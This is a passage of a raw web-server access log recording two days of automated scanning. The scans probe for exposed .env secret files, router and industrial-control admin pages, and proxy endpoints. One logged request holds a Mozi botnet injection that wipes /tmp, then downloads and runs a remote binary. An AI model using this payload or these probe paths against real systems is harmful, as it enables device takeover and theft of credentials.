bytes} [Fri Feb 11 03:05:07 2022] GET http://ip.ws.126.net/ipquery => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 74/1036] 222.186.46.200 () {26 vars in 337 bytes} [Fri Feb 11 03:05:07 2022] CONNECT ip.ws.126.net:443 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 75/1037] 222.186.46.200 () {30 vars in 501 bytes} [Fri Feb 11 03:05:07 2022] GET http://ip.ws.126.net/ipquery => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 890/1038] 103.203.56.1 () {32 vars in 398 bytes} [Fri Feb 11 03:34:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 891/1039] 18.234.178.79 () {36 vars in 520 bytes} [Fri Feb 11 03:52:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 892/1040] 201.48.66.50 () {32 vars in 463 bytes} [Fri Feb 11 04:34:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 893/1041] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 11 05:08:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 894/1042] 183.136.225.14 () {34 vars in 459 bytes} [Fri Feb 11 05:59:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 895/1043] 183.136.225.14 () {36 vars in 542 bytes} [Fri Feb 11 06:00:47 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 896/1044] 183.136.225.14 () {36 vars in 540 bytes} [Fri Feb 11 06:00:47 2022] GET /robots.txt => generated 179 bytes in 1 msecs 
(HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 897/1045] 20.151.201.9 () {32 vars in 447 bytes} [Fri Feb 11 06:12:53 2022] GET /cgi-bin/luci => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 898/1046] 101.133.224.74 () {32 vars in 503 bytes} [Fri Feb 11 06:51:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 899/1047] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 11 07:30:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.123 client_port: 7419] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 900/1048] 185.180.143.79 () {30 vars in 447 bytes} [Fri Feb 11 08:09:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 901/1049] 185.180.143.79 () {30 vars in 471 bytes} [Fri Feb 11 08:09:11 2022] GET /showLogin.cc => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 902/1050] 128.14.134.170 () {34 vars in 488 bytes} [Fri Feb 11 08:21:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 903/1051] 222.186.19.235 () {30 vars in 550 bytes} [Fri Feb 11 08:39:09 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19140|app: 0|req: 3/1052] 222.186.19.235 () {30 vars in 500 bytes} [Fri Feb 11 08:39:09 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 904/1053] 123.56.127.97 () {22 vars in 234 bytes} [Fri Feb 11 
09:38:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 905/1054] 123.56.127.97 () {22 vars in 296 bytes} [Fri Feb 11 09:38:31 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 906/1055] 123.56.127.97 () {22 vars in 237 bytes} [Fri Feb 11 09:38:32 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 76/1056] 123.56.127.97 () {22 vars in 238 bytes} [Fri Feb 11 09:38:32 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 34/1057] 123.56.127.97 () {40 vars in 484 bytes} [Fri Feb 11 09:38:32 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19139|app: 0|req: 3/1058] 123.56.127.97 () {34 vars in 465 bytes} [Fri Feb 11 09:38:35 2022] POST /sdk => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 11/1059] 123.56.127.97 () {32 vars in 477 bytes} [Fri Feb 11 09:38:35 2022] GET /nmaplowercheck1644572315 => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 35/1060] 123.56.127.97 () {32 vars in 439 bytes} [Fri Feb 11 09:38:36 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 77/1061] 123.56.127.97 () {32 vars in 449 bytes} [Fri Feb 11 09:38:36 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 78/1062] 123.56.127.97 () {28 vars in 307 bytes} [Fri Feb 11 09:38:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 
bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 79/1063] 123.56.127.97 () {32 vars in 466 bytes} [Fri Feb 11 09:38:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 907/1064] 123.56.127.97 () {28 vars in 420 bytes} [Fri Feb 11 09:38:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 908/1065] 5.8.10.202 () {30 vars in 333 bytes} [Fri Feb 11 10:48:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 36/1066] 5.8.10.202 () {34 vars in 500 bytes} [Fri Feb 11 10:48:30 2022] GET /aaa9 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 80/1067] 5.8.10.202 () {34 vars in 500 bytes} [Fri Feb 11 10:48:45 2022] GET /aaa9 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 909/1068] 5.8.10.202 () {34 vars in 500 bytes} [Fri Feb 11 10:48:46 2022] GET /aab9 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 910/1069] 113.31.103.17 () {30 vars in 328 bytes} [Fri Feb 11 11:04:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 911/1070] 83.97.20.34 () {30 vars in 328 bytes} [Fri Feb 11 11:12:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 912/1071] 20.151.201.9 () {36 vars in 499 bytes} [Fri Feb 11 11:57:36 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 913/1072] 103.203.58.4 () {30 vars in 346 bytes} [Fri Feb 11 12:10:04 2022] GET / => generated 179 bytes in 1 msecs 
(HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 914/1073] 202.141.244.42 () {32 vars in 465 bytes} [Fri Feb 11 12:16:47 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 915/1074] 34.140.248.32 () {42 vars in 562 bytes} [Fri Feb 11 12:39:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 916/1075] 185.180.143.72 () {34 vars in 488 bytes} [Fri Feb 11 13:40:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 917/1076] 64.62.197.122 () {28 vars in 307 bytes} [Fri Feb 11 13:52:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 918/1077] 106.15.191.82 () {34 vars in 459 bytes} [Fri Feb 11 14:22:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 919/1078] 37.201.144.31 () {32 vars in 487 bytes} [Fri Feb 11 14:28:39 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 920/1079] 192.241.211.225 () {34 vars in 395 bytes} [Fri Feb 11 15:15:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 921/1080] 128.14.141.34 () {34 vars in 487 bytes} [Fri Feb 11 16:50:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 922/1081] 39.99.229.34 () {32 vars in 408 bytes} [Fri Feb 11 17:03:55 2022] GET /text4041644599035 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 923/1082] 39.99.229.34 () {34 vars in 410 bytes} [Fri 
Feb 11 17:03:55 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 924/1083] 39.99.229.34 () {32 vars in 394 bytes} [Fri Feb 11 17:03:55 2022] GET /evox/about => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 925/1084] 39.99.229.34 () {32 vars in 384 bytes} [Fri Feb 11 17:03:55 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 926/1085] 39.99.229.34 () {28 vars in 306 bytes} [Fri Feb 11 17:03:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 927/1086] 39.99.229.34 () {36 vars in 462 bytes} [Fri Feb 11 17:04:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 928/1087] 39.99.229.34 () {34 vars in 413 bytes} [Fri Feb 11 17:04:17 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 929/1088] 183.136.225.56 () {34 vars in 535 bytes} [Fri Feb 11 17:07:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 930/1089] 116.233.200.101 () {26 vars in 299 bytes} [Fri Feb 11 17:28:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 931/1090] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 11 17:28:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 932/1091] 116.233.200.101 () {42 vars in 799 bytes} [Fri Feb 11 17:28:18 2022] POST /cgi-bin/luci/;stok=/locale?form=lang => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 
switches on core 0) +[pid: 19148|app: 0|req: 933/1092] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 11 17:28:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 934/1093] 116.233.200.101 () {30 vars in 371 bytes} [Fri Feb 11 17:28:20 2022] GET /navigation.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 12/1095] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 11 17:28:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 935/1095] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 11 17:28:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 12/1096] 116.233.200.101 () {30 vars in 424 bytes} [Fri Feb 11 17:28:20 2022] GET /fx_plcinf.html?CMD=Monitor%20Start&LANG=EN => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19141|app: 0|req: 4/1097] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 11 17:28:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 936/1098] 116.233.200.101 () {30 vars in 367 bytes} [Fri Feb 11 17:28:20 2022] GET /ifixwebspace/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 937/1099] 116.233.200.101 () {30 vars in 365 bytes} [Fri Feb 11 17:28:20 2022] GET /KingViewWeb/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 938/1100] 116.233.200.101 () {30 vars in 367 bytes} [Fri Feb 11 17:28:20 2022] GET /webconfig.ini => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 939/1101] 
83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 11 17:30:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 940/1102] 170.254.73.151 () {32 vars in 463 bytes} [Fri Feb 11 18:20:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 941/1103] 209.17.96.154 () {30 vars in 410 bytes} [Fri Feb 11 18:25:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 942/1104] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 11 19:16:36 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 943/1105] 106.75.85.103 () {38 vars in 617 bytes} [Fri Feb 11 20:17:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 944/1106] 185.216.215.107 () {40 vars in 569 bytes} [Fri Feb 11 20:45:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 945/1107] 40.71.60.51 () {36 vars in 521 bytes} [Fri Feb 11 21:02:58 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 946/1108] 40.71.60.51 () {40 vars in 628 bytes} [Fri Feb 11 21:02:59 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 947/1109] 62.171.150.168 () {28 vars in 311 bytes} [Fri Feb 11 21:16:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 948/1110] 62.171.150.168 () {40 vars in 678 bytes} [Fri Feb 11 21:16:49 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on 
core 0) +[pid: 19148|app: 0|req: 949/1111] 185.216.215.107 () {40 vars in 569 bytes} [Fri Feb 11 22:19:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 950/1112] 121.138.118.226 () {32 vars in 466 bytes} [Fri Feb 11 23:46:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 951/1113] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 11 23:59:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 952/1114] 23.95.100.141 () {48 vars in 869 bytes} [Sat Feb 12 00:32:28 2022] POST /boaform/admin/formLogin => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 953/1115] 47.101.198.81 () {34 vars in 459 bytes} [Sat Feb 12 00:56:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 954/1116] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 12 01:19:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 955/1117] 109.248.128.75 () {36 vars in 491 bytes} [Sat Feb 12 01:50:49 2022] GET /logs => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 956/1118] 114.134.11.31 () {28 vars in 307 bytes} [Sat Feb 12 02:01:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 957/1119] 46.249.33.15 () {42 vars in 676 bytes} [Sat Feb 12 02:11:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 104.152.52.106 client_port: 1247] hr_read(): Connection reset by peer [plugins/http/http.c line 918] 
+[pid: 19148|app: 0|req: 958/1120] 193.118.53.194 () {34 vars in 488 bytes} [Sat Feb 12 03:39:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.123 client_port: 7419] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 959/1121] 13.212.184.170 () {36 vars in 441 bytes} [Sat Feb 12 05:07:20 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 960/1122] 13.212.184.170 () {36 vars in 453 bytes} [Sat Feb 12 05:07:21 2022] GET /admin/.env => generated 0 bytes in 2 msecs (HTTP/1.1 302) 9 headers in 335 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 961/1123] 13.212.184.170 () {36 vars in 461 bytes} [Sat Feb 12 05:07:21 2022] GET /admin-app/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 962/1124] 13.212.184.170 () {36 vars in 449 bytes} [Sat Feb 12 05:07:21 2022] GET /api/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 963/1125] 13.212.184.170 () {36 vars in 451 bytes} [Sat Feb 12 05:07:21 2022] GET /back/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 964/1126] 13.212.184.170 () {36 vars in 457 bytes} [Sat Feb 12 05:07:22 2022] GET /backend/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 965/1127] 13.212.184.170 () {36 vars in 447 bytes} [Sat Feb 12 05:07:22 2022] GET /cp/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 966/1128] 13.212.184.170 () {36 vars in 465 bytes} [Sat Feb 12 05:07:22 2022] GET /development/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 
5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 967/1129] 13.212.184.170 () {36 vars in 455 bytes} [Sat Feb 12 05:07:22 2022] GET /docker/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 968/1130] 13.212.184.170 () {36 vars in 453 bytes} [Sat Feb 12 05:07:23 2022] GET /local/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 969/1131] 13.212.184.170 () {36 vars in 457 bytes} [Sat Feb 12 05:07:23 2022] GET /private/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 970/1132] 13.212.184.170 () {36 vars in 451 bytes} [Sat Feb 12 05:07:23 2022] GET /rest/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 971/1133] 13.212.184.170 () {36 vars in 455 bytes} [Sat Feb 12 05:07:23 2022] GET /shared/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 972/1134] 13.212.184.170 () {36 vars in 457 bytes} [Sat Feb 12 05:07:23 2022] GET /laravel/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 973/1135] 13.212.184.170 () {36 vars in 455 bytes} [Sat Feb 12 05:07:24 2022] GET /system/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 974/1136] 13.212.184.170 () {36 vars in 457 bytes} [Sat Feb 12 05:07:24 2022] GET /sources/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 975/1137] 13.212.184.170 () {36 vars in 455 bytes} [Sat Feb 12 05:07:24 2022] GET /public/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 
0|req: 976/1138] 13.212.184.170 () {36 vars in 447 bytes} [Sat Feb 12 05:07:24 2022] GET /v1/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 977/1139] 13.212.184.170 () {36 vars in 449 bytes} [Sat Feb 12 05:07:25 2022] GET /app/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 978/1140] 13.212.184.170 () {36 vars in 455 bytes} [Sat Feb 12 05:07:25 2022] GET /config/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 979/1141] 13.212.184.170 () {36 vars in 451 bytes} [Sat Feb 12 05:07:25 2022] GET /core/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 980/1142] 13.212.184.170 () {36 vars in 451 bytes} [Sat Feb 12 05:07:25 2022] GET /apps/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 981/1143] 13.212.184.170 () {36 vars in 449 bytes} [Sat Feb 12 05:07:26 2022] GET /lib/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 982/1144] 13.212.184.170 () {36 vars in 451 bytes} [Sat Feb 12 05:07:26 2022] GET /cron/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 983/1145] 13.212.184.170 () {36 vars in 459 bytes} [Sat Feb 12 05:07:26 2022] GET /database/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 984/1146] 13.212.184.170 () {36 vars in 457 bytes} [Sat Feb 12 05:07:26 2022] GET /uploads/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 985/1147] 13.212.184.170 () {36 vars in 451 bytes} [Sat Feb 12 
05:07:27 2022] GET /site/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 986/1148] 13.212.184.170 () {36 vars in 449 bytes} [Sat Feb 12 05:07:27 2022] GET /web/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 37/1149] 13.212.184.170 () {36 vars in 469 bytes} [Sat Feb 12 05:07:27 2022] GET /administrator/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 987/1150] 116.16.152.247 () {34 vars in 643 bytes} [Sat Feb 12 05:28:47 2022] GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 988/1151] 185.216.215.107 () {40 vars in 569 bytes} [Sat Feb 12 05:56:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 989/1152] 132.145.39.16 () {34 vars in 438 bytes} [Sat Feb 12 06:52:19 2022] GET /contact => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 990/1153] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 12 07:07:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 991/1154] 1.12.217.218 () {44 vars in 748 bytes} [Sat Feb 12 07:58:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 992/1155] 38.146.84.247 () {32 vars in 464 bytes} [Sat Feb 12 09:04:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 993/1156] 109.237.103.123 () {36 vars in 525 bytes} [Sat Feb 12 09:05:13 2022] GET /.env => 
